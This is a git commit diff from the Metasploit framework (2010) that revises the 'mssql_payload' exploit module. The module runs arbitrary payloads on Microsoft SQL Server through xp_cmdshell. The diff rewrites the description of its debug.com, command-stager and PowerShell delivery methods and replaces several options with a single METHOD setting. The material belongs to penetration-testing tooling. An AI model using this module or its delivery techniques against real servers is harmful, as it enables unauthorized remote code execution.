fix super busted mssql_payload some more

git-svn-id: file:///home/svn/framework3/trunk@11392 4d416f70-5f16-0410-b530-b9f4589650da
2010-12-21 20:36:34 +00:00 · 2010-12-21 20:36:34 +00:00 · 5fb2bfc969
parent 7db17e323e
commit 5fb2bfc969
1 changed files with 26 additions and 12 deletions
--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@ -24,9 +24,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Microsoft SQL Server Payload Execution',
 			'Description'    => %q{
-					This module will utilize multiple methods in payload delivery on a given system all through MSSQL. JDuck's method will utilize wscript in order to execute the initial stager. ReL1K's method will utilize either Windows Debug which is currently installed on anything pre Windows 7 and utilize binary to hex conversion methods. ReL1K's newest method can utilize powershell for the conversion methods and can only be used on Server 2008 and Windows 7 based systems or with other systems that have installed powershell.
+					This module executes an arbitrary payload on a Microsoft SQL Server by using
+				the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.
+
+				First, the original method uses Windows 'debug.com'. File size restrictions are
+				avoidied by incorporating the debug bypass method presented by SecureStat at
+				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.
+
+				A second method takes advantage of the Command Stager subsystem. This allows using
+				various techniques, such as using a TFTP server, to send the executable. By default
+				the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+
+				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
+				payload on the target.
+
+				NOTE: This module will leave a payload executable on the target system when the
+				attack is finished.
 			},
-			'Author'         => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', 'jduck' ],
+			'Author'         =>
+				[
+					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
+					'jduck'  # command stager mods
+				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
@ -52,9 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
-				OptBool.new('UseCmdStager', [ false, "Wait for user input before returning from exploit", true ]),
-				OptBool.new('UseWinDebug',[ false, "Use Windows debug for payload conversion, 2k3 and below only", false]),
-				OptBool.new('UsePowerShell',[ false, "Use PowerShell for the payload conversion on Server 2008 and Windows 7", false]),
+				OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
 			])
 	end

@ -70,12 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end

-		if (not mssql_login_datastore)
-			print_status("Invalid SQL Server credentials")
-			return
-		end
+		method = datastore['METHOD'].downcase
 		
-		if (datastore['UseCmdStager'])
+		if (method =~ /^cmd/)
 			execute_cmdstager({ :linemax => 1500, :nodelete => true })
 			#execute_cmdstager({ :linemax => 1500 })
 		else
@ -83,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			exe = generate_payload_exe

 			# Use powershell method for payload delivery if specified
-			if (datastore['UsePowerShell'])
+			if (method =~ /^ps/) or (method =~ /^power/)
 				powershell_upload_exec(exe)
 			else
 				# Otherwise, fall back to the old way..